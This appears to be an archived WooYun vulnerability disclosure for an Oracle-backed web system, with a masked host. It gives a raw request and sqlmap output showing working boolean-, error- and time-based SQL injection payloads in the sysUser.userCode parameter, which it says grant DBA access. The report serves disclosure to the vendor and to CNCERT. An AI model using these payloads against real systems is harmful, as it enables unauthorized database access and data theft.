乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-11: 细节已通知厂商并且等待厂商处理中 2015-12-15: 厂商已经确认,细节仅向厂商公开 2015-12-25: 细节向核心白帽子及相关领域专家公开 2016-01-04: 细节向普通白帽子公开 2016-01-14: 细节向实习白帽子公开 2016-01-28: 细节向公众公开
RT
漏洞地址
GET /teweb/personnel/personnel!checkUserCode.action?clientid=userCode&rand=1449747891472&sysUser.userCode=admin*&sysUser.credentialsno=&usercode=&_=1449747873785 HTTP/1.1Host: **.**.**.**:8080Proxy-Connection: keep-aliveAccept: text/html, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36Referer: http://**.**.**.**:8080/teweb/page/userreg/unit/unitRegApply1.jsp;jsessionid=AC87266F02AD7EDA6D2ADFE49F76F657Accept-Encoding: gzip, deflate, sdchAccept-Language: zh-CN,zh;q=0.8Cookie: JSESSIONID=AC87266F02AD7EDA6D2ADFE49F76F657
sysUser.userCode参数存在注入
---Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://**.**.**.**:8080/teweb/personnel/personnel!checkUserCode.action?clientid=userCode&rand=1449746998788&sysUser.userCode=admin' AND 7603=7603 AND 'KPAP'='KPAP&sysUser.credentialsno=&usercode=&_=1449746819223 Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: http://**.**.**.**:8080/teweb/personnel/personnel!checkUserCode.action?clientid=userCode&rand=1449746998788&sysUser.userCode=admin' AND 9537=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(120)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (9537=9537) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(120)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND 'YDzi'='YDzi&sysUser.credentialsno=&usercode=&_=1449746819223 Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: http://**.**.**.**:8080/teweb/personnel/personnel!checkUserCode.action?clientid=userCode&rand=1449746998788&sysUser.userCode=admin' AND 7564=DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(119)||CHR(83)||CHR(102),5) AND 'lIGs'='lIGs&sysUser.credentialsno=&usercode=&_=1449746819223---[19:32:28] [INFO] the back-end DBMS is Oracleback-end DBMS: Oracle
DBA权限
@
危害等级:中
漏洞Rank:10
确认时间:2015-12-15 14:34
CNVD未复现所述情况,已经转由CNCERT向国家上级信息安全协调机构上报,由其后续协调网站管理单位处置。
暂无